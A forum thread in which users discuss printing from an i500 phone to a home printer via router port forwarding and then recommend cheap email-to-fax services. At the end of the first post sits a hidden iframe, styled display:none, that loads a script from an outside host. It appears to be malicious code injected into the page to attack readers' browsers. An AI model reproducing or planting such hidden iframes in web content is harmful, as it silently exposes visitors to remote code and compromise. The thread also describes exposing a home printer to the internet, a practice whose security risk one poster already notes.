+ Reply to Thread

Printing Wirelessly from I500

I can now print from my i5 to my home printer wirelessly. I have Quickword premier and it came bundled with a printer utililty called Printboy. Printboy can print to network printers. So I setup my home printer (which is on a print server) to receive print jobs from the internet. Wow! I can just hit print and it prints on my home printer. This is just awesome! If anyone needs to know the detail ask me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Scrambled

I would love to know how you did it.

But also a little caution - Enabling your network to recieve printing requests through the internet may open up your network to attacks since (if i'm not mistaken) your address is being brodcast through the internet.

Send me over how you did it and I'll look into this security issue.

-Mike

Yes network security is a concern I will have to look into it myself as well.

The setup is very simple. I have a home network with a router and a HP fax/printer/Scanner on a print server. I used the forward function of the router to forward calls to my ISP assigned IP address and port number "XXXX" to the subnet IP address of my printer.
    Scrambled

I found a cheaper (and a safer maybe) solution for my printing needs on the run. I thought I would share my experience with everyone in need of printing on the run from their beloved i5.

The faxaway.com out of Seattle will allow you to send faxes to any phone number within the US and Canada for 10 cents per minute. All one has to do is send an email like 12065551212@faxaway.com to faxaway.com server and within 2-3 minutes your file gets sent to the fax number (12065551212). Cool!! Now I can have my print job faxed to me in hotels and other places on the run. I found many other businesses like efax.com or Printeron.com etc. offering similar services. However, faxaway seems to be by far the cheapest. The monthly fee is only $1 for low volume customers and the charges are based on the fax per minute and not per page like others. Typically 1 to 2 page faxed print job takes only 1 minute for text only job. The faxaway does require a minimum of $10 initial charge that is applied to your account.

I would still prefer to not pay the $1 per month service charge but I guess it will not break the bank for the convenience. I still need to figure out how I can trigger my own network fax machine at my home office to receive my print job and forward it to the fax number of choice. Anyone got any ideas?
    Scrambled

Originally posted by scrambled
    I found a cheaper (and a safer maybe) solution for my printing needs on the run. I thought I would share my experience with everyone in need of printing on the run from their beloved i5.

The faxaway.com out of Seattle ...
    Cool find, i think i'll give these guys a try since efax just killed my free account. $1 is almost as good as free!